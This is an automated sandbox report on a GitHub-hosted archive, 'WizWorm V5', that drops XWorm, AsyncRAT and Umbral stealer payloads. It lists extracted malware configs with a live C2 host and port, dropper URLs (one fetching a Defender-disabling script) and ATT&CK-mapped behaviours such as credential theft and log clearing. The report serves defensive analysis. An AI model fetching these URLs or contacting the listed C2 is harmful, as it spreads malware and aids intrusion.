asyncrat | hxxps://github[.]com/0xmyjozief/WizWorm-V5-xRAT/raw/main/WizWorm%20V5[.]rar

Analysis

max time kernel
258s
max time network
376s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
25-08-2024 23:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/0xmyjozief/WizWorm-V5-xRAT/raw/main/WizWorm%20V5.rar

Score

10^/10

asyncrat umbral xworm default credential_access defense_evasion discovery execution rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/eq44/d/raw/main/wzcstatus.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Version

3.1

true-baghdad.gl.at.ply.gg:61202

Mutex

Z0m98pC7RpsdD0uc

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

asyncrat

Version

WeedRAT

Botnet

Default

true-baghdad.gl.at.ply.gg:61202

Mutex

xInKFBCkbzDz

Attributes

delay
3
install
true
install_file
wzcdetect.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Umbral payload 32 IoCs

resource	yara_rule
behavioral1/files/0x000200000002aa81-289.dat	family_umbral
behavioral1/memory/4276-299-0x0000019D11960000-0x0000019D119A0000-memory.dmp	family_umbral
behavioral1/memory/6336-1020-0x00000138CB3B0000-0x00000138CB3F0000-memory.dmp	family_umbral
behavioral1/memory/6572-1091-0x000001AE94990000-0x000001AE949D0000-memory.dmp	family_umbral
behavioral1/memory/7008-1456-0x00000263450B0000-0x00000263450F0000-memory.dmp	family_umbral
behavioral1/memory/3012-1643-0x000002AF1D370000-0x000002AF1D3B0000-memory.dmp	family_umbral
behavioral1/memory/5676-1774-0x00000196F3C20000-0x00000196F3C60000-memory.dmp	family_umbral
behavioral1/memory/6264-1974-0x000001C790A70000-0x000001C790AB0000-memory.dmp	family_umbral
behavioral1/memory/2824-2048-0x000001D9D3F30000-0x000001D9D3F70000-memory.dmp	family_umbral
behavioral1/memory/904-2148-0x000001BF06100000-0x000001BF06140000-memory.dmp	family_umbral
behavioral1/memory/3168-2259-0x0000026ECD720000-0x0000026ECD760000-memory.dmp	family_umbral
behavioral1/memory/4856-2396-0x00000169ACA30000-0x00000169ACA70000-memory.dmp	family_umbral
behavioral1/memory/5656-2480-0x0000018900EE0000-0x0000018900F20000-memory.dmp	family_umbral
behavioral1/memory/6908-2620-0x0000026AFB1C0000-0x0000026AFB200000-memory.dmp	family_umbral
behavioral1/memory/6912-2722-0x000001DD8AAF0000-0x000001DD8AB30000-memory.dmp	family_umbral
behavioral1/memory/660-2859-0x0000015E58A10000-0x0000015E58A50000-memory.dmp	family_umbral
behavioral1/memory/6272-2949-0x0000027993690000-0x00000279936D0000-memory.dmp	family_umbral
behavioral1/memory/2084-3186-0x0000024104970000-0x00000241049B0000-memory.dmp	family_umbral
behavioral1/memory/3012-3228-0x000001B385E60000-0x000001B385EA0000-memory.dmp	family_umbral
behavioral1/memory/6612-3422-0x000002460F580000-0x000002460F5C0000-memory.dmp	family_umbral
behavioral1/memory/5312-3554-0x000001E7B8DC0000-0x000001E7B8E00000-memory.dmp	family_umbral
behavioral1/memory/4168-3595-0x00000242F3060000-0x00000242F30A0000-memory.dmp	family_umbral
behavioral1/memory/5516-3611-0x000001441F0F0000-0x000001441F130000-memory.dmp	family_umbral
behavioral1/memory/392-3625-0x00000279E4750000-0x00000279E4790000-memory.dmp	family_umbral
behavioral1/memory/820-3641-0x000002A3370B0000-0x000002A3370F0000-memory.dmp	family_umbral
behavioral1/memory/6148-3771-0x00000193A0F60000-0x00000193A0FA0000-memory.dmp	family_umbral
behavioral1/memory/1364-3790-0x0000027F95E00000-0x0000027F95E40000-memory.dmp	family_umbral
behavioral1/memory/5684-3885-0x000001B63D930000-0x000001B63D970000-memory.dmp	family_umbral
behavioral1/memory/6648-3963-0x000001BCAB830000-0x000001BCAB870000-memory.dmp	family_umbral
behavioral1/memory/1372-4097-0x0000026B76D60000-0x0000026B76DA0000-memory.dmp	family_umbral
behavioral1/memory/1608-4202-0x000002C81EFE0000-0x000002C81F020000-memory.dmp	family_umbral
behavioral1/memory/6892-4234-0x0000024134470000-0x00000241344B0000-memory.dmp	family_umbral

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3640-267-0x0000022BEEEE0000-0x0000022BEEEEE000-memory.dmp	family_xworm

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 2840 created 3168	2840	WerFault.exe	418
PID 2692 created 6912	2692	Process not Found	479

Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs

description	pid	Process	procid_target
PID 6416 created 1716	6416	svchost.exe	335
PID 6416 created 4348	6416	svchost.exe	425
PID 6416 created 5152	6416	svchost.exe	429
PID 6416 created 5172	6416	svchost.exe	701
PID 6416 created 3168	6416	svchost.exe	418
PID 6416 created 2936	6416	svchost.exe	694
PID 6416 created 6000	6416	svchost.exe	499
PID 6416 created 6912	6416	svchost.exe	479
PID 6416 created 2696	6416	svchost.exe	544
PID 6416 created 5612	6416	svchost.exe	552

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000200000002aa80-280.dat	family_asyncrat

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 31 IoCs

flow	pid	Process
24	3752	powershell.exe
25	424	powershell.exe
26	424	powershell.exe
27	3640	powershell.exe
29	3752	powershell.exe
31	5204	powershell.exe
32	5204	powershell.exe
37	6084	powershell.exe
38	5220	powershell.exe
39	5220	powershell.exe
40	5680	powershell.exe
41	5680	powershell.exe
42	6084	powershell.exe
43	4520	powershell.exe
44	4520	powershell.exe
45	2108	powershell.exe
47	2108	powershell.exe
48	5440	powershell.exe
49	5440	powershell.exe
50	5288	powershell.exe
51	5288	powershell.exe
53	5704	powershell.exe
55	5704	powershell.exe
58	6632	powershell.exe
59	2400	powershell.exe
60	6632	powershell.exe
61	2400	powershell.exe
62	3640	powershell.exe
65	5284	powershell.exe
66	5284	powershell.exe
85	3640	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 48 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1520	powershell.exe
1716	powershell.exe
424	powershell.exe
6720	powershell.exe
1524	powershell.exe
6968	powershell.exe
5896	powershell.exe
6916	powershell.exe
2936	powershell.exe
404	powershell.exe
2108	powershell.exe
3036	powershell.exe
6296	powershell.exe
2240	powershell.exe
4164	powershell.exe
6764	powershell.exe
5168	powershell.exe
6204	powershell.exe
3480	powershell.exe
7016	powershell.exe
5280	powershell.exe
2092	powershell.exe
4816	powershell.exe
5128	powershell.exe
4348	powershell.exe
1900	powershell.exe
6284	powershell.exe
6576	powershell.exe
5964	powershell.exe
5152	powershell.exe
7072	powershell.exe
7008	powershell.exe
5336	powershell.exe
5244	powershell.exe
6376	powershell.exe
6860	powershell.exe
6320	powershell.exe
5908	powershell.exe
1888	powershell.exe
7124	powershell.exe
1928	powershell.exe
4004	powershell.exe
5776	powershell.exe
5744	powershell.exe
3640	powershell.exe
4604	powershell.exe
2412	powershell.exe
5668	powershell.exe

Drops file in Drivers directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe

Executes dropped EXE 64 IoCs

pid	Process
4844	WizWorm V5.exe
2496	WizWormV4.exe
1560	WizWormV4.exe
4892	RoboterXRAT V5.exe
2100	WizWormV4.exe
2924	RoboterXRAT V5.exe
1832	RoboterXRAT V5.exe
4600	WeedClient.exe
4276	sihost.exe
3060	WizWormV4.exe
2496	RoboterXRAT V5.exe
2896	RoboterXRAT V5.exe
4440	WeedClient.exe
3876	sihost.exe
2840	WizWormV4.exe
1172	RoboterXRAT V5.exe
2100	WeedClient.exe
5084	sihost.exe
2072	RoboterXRAT V5.exe
2840	WeedClient.exe
3988	sihost.exe
1408	wzcdetect.exe
4876	RoboterXRAT V5.exe
4396	RoboterXRAT V5.exe
2684	WeedClient.exe
3828	sihost.exe
436	RoboterXRAT V5.exe
5124	WeedClient.exe
5236	sihost.exe
5416	RoboterXRAT V5.exe
5444	WeedClient.exe
5536	sihost.exe
5572	wzcdetect.exe
5784	RoboterXRAT V5.exe
5820	WeedClient.exe
5888	sihost.exe
5588	RoboterXRAT V5.exe
5296	WeedClient.exe
5644	sihost.exe
1824	wzcstatus.exe
4164	RoboterXRAT V5.exe
1560	WeedClient.exe
3196	sihost.exe
2944	wzcnetwork.exe
5628	wzcsvc.exe
3196	wzcstatus.exe
5944	RoboterXRAT V5.exe
6032	WeedClient.exe
716	wzcstatus.exe
5704	wzcstatus.exe
5780	wzcdetect.exe
1876	sihost.exe
4636	wzcdetect.exe
5760	wzcnetwork.exe
5404	wzcsvc.exe
3236	RoboterXRAT V5.exe
4844	WeedClient.exe
2696	sihost.exe
3480	wzcdetect.exe
4572	WeedClient.exe
5652	RoboterXRAT V5.exe
6336	sihost.exe
6616	RoboterXRAT V5.exe
6848	WeedClient.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx	svchost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 22 IoCs

Web Service

T1102

flow	ioc
90	discord.com
3	raw.githubusercontent.com
7	raw.githubusercontent.com
22	discord.com
34	raw.githubusercontent.com
36	discord.com
55	raw.githubusercontent.com
68	discord.com
92	discord.com
23	discord.com
35	raw.githubusercontent.com
47	raw.githubusercontent.com
108	discord.com
114	discord.com
120	discord.com
64	raw.githubusercontent.com
64	discord.com
72	discord.com
95	discord.com
66	raw.githubusercontent.com
80	discord.com
99	discord.com

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
56	ip-api.com
64	ip-api.com
92	ip-api.com
97	ip-api.com
99	ip-api.com
109	ip-api.com
114	ip-api.com
16	ip-api.com

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe
File opened for modification	C:\Windows\System32\Tasks\wzcdetect	svchost.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wzcdetect.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wzcdetect.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wzcdetect.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wzcdetect.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 16 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3512	PING.EXE
6080	cmd.exe
1804	cmd.exe
6828	PING.EXE
5128	cmd.exe
5464	cmd.exe
6192	PING.EXE
4556	cmd.exe
5968	cmd.exe
4168	cmd.exe
5760	cmd.exe
5420	PING.EXE
5988	PING.EXE
1824	PING.EXE
5468	PING.EXE
4984	PING.EXE

Checks processor information in registry 2 TTPs 63 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe

Delays execution with timeout.exe 11 IoCs

evasion

pid	Process
5608	timeout.exe
5156	timeout.exe
5860	timeout.exe
5740	timeout.exe
3436	timeout.exe
3300	timeout.exe
3380	timeout.exe
4580	timeout.exe
4396	timeout.exe
4332	timeout.exe
1832	timeout.exe

Detects videocard installed 1 TTPs 8 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
7036	wmic.exe
6644	wmic.exe
5736	wmic.exe
948	wmic.exe
5200	wmic.exe
6984	wmic.exe
2492	wmic.exe
6120	wmic.exe

Enumerates system info in registry 2 TTPs 22 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

